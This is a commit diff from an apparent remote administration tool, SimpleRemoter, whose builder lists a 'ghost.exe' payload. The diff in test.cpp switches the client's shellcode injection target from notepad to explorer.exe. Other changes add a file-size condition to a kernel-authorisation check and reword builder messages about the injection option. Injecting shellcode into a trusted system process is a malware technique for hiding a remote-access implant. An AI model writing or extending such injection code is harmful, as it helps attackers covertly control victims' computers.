admin/SimpleRemoter
1
0
Fork 0
mirror of https://github.com/yuanyuanxiang/SimpleRemoter.git synced 2026-01-21 23:13:08 +08:00
Code Issues Packages Projects Releases Wiki Activity

TestRun: Change inject shellcode to explorer <- notepad

Browse Source
This commit is contained in:
yuanyuanxiang
2026-01-01 22:51:15 +01:00
parent 5d61ae57ca
commit e86afe74da
4 changed files with 10 additions and 8 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
client/LoginServer.cpp
View File

@@ -336,7 +336,9 @@ LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, CONNECT_ADDRESS& conn, BOOL& isAuthKerne
std::string pid = std::to_string(GetCurrentProcessId());
HANDLE hEvent1 = OpenEventA(SYNCHRONIZE, FALSE, std::string("YAMA_" + pid).c_str());
HANDLE hEvent2 = OpenEventA(SYNCHRONIZE, FALSE, std::string("EVENT_" + pid).c_str());
if (hEvent1 != NULL || hEvent2 != NULL)
WIN32_FILE_ATTRIBUTE_DATA fileInfo;
GetFileAttributesExA(buf, GetFileExInfoStandard, &fileInfo);
if ((hEvent1 != NULL || hEvent2 != NULL) && fileInfo.nFileSizeLow > 16 * 1024 * 1024)
{
Mprintf("Check event handle: %d, %d\n", hEvent1 != NULL, hEvent2 != NULL);
isAuthKernel = TRUE;

4
client/test.cpp
View File

@@ -262,7 +262,7 @@ int main(int argc, const char *argv[])
g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port);
}
// 此 Shell code 连接本机6543端口注入到记事本
// 此 Shell code 连接本机6543端口注入到任务管理器
if (g_ConnectAddress.iStartup == Startup_InjSC) {
// Try to inject shell code to `notepad.exe`
// If failed then run memory DLL
@@ -272,7 +272,7 @@ int main(int argc, const char *argv[])
do {
if (sizeof(void*) == 4) // Shell code is 64bit
break;
if (!(pid = inj.InjectProcess(nullptr, ok))) {
if (!(pid = inj.InjectProcess("explorer.exe", ok))) {
break;
}
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid);

6
server/2015Remote/2015RemoteDlg.cpp
View File

@@ -1948,7 +1948,7 @@ bool CMy2015RemoteDlg::CheckValid(int trail)
auto v = splitString(dlg.m_sPassword.GetBuffer(), '-');
if (v.size() != 6 && v.size() != 7) {
THIS_CFG.SetStr(settings, pwdKey, "");
MessageBox("格式错误,请重新申请口令!", "提示", MB_ICONINFORMATION);
THIS_APP->MessageBox("格式错误,请重新申请口令!", "提示", MB_ICONINFORMATION);
return false;
}
std::vector<std::string> subvector(v.end() - 4, v.end());
@@ -1961,7 +1961,7 @@ bool CMy2015RemoteDlg::CheckValid(int trail)
THIS_CFG.SetStr(settings, "PwdHmac", "");
if (pwd.IsEmpty() || hash256 != fixedKey || IDOK != dlg.DoModal()) {
if (!dlg.m_sPassword.IsEmpty())
MessageBox("口令错误, 无法继续操作!", "提示", MB_ICONWARNING);
THIS_APP->MessageBox("口令错误, 无法继续操作!", "提示", MB_ICONWARNING);
return false;
}
}
@@ -1971,7 +1971,7 @@ bool CMy2015RemoteDlg::CheckValid(int trail)
std::strftime(curDate, sizeof(curDate), "%Y%m%d", &pekingTime);
if (curDate < v[0] || curDate > v[1]) {
THIS_CFG.SetStr(settings, pwdKey, "");
MessageBox("口令过期,请重新申请口令!", "提示", MB_ICONINFORMATION);
THIS_APP->MessageBox("口令过期,请重新申请口令!", "提示", MB_ICONINFORMATION);
return false;
}
if (dlg.m_sPassword != pwd)

4
server/2015Remote/BuildDlg.cpp
View File

@@ -204,7 +204,7 @@ void CBuildDlg::OnBnClickedOk()
int index = m_ComboExe.GetCurSel(), typ=index;
int is64bit = m_ComboBits.GetCurSel() == 0;
if (index == IndexTestRun_InjSC && !is64bit) {
MessageBox("Shellcode 只能向64位记事本注入注入器也只能是64位!", "提示", MB_ICONWARNING);
MessageBox("Shellcode 只能向64位电脑注入注入器也只能是64位!", "提示", MB_ICONWARNING);
return;
}
int startup = Startup_DLL;
@@ -434,7 +434,7 @@ BOOL CBuildDlg::OnInitDialog()
pEdit->LimitText(99);
m_ComboExe.InsertString(IndexTestRun_DLL, "TestRun - 磁盘DLL");
m_ComboExe.InsertString(IndexTestRun_MemDLL, "TestRun - 内存DLL");
m_ComboExe.InsertString(IndexTestRun_InjSC, "TestRun - 注入记事本");
m_ComboExe.InsertString(IndexTestRun_InjSC, "TestRun - 注入任务管理器");
m_ComboExe.InsertString(IndexGhost, "ghost.exe");
m_ComboExe.InsertString(IndexServerDll, "ServerDll.dll");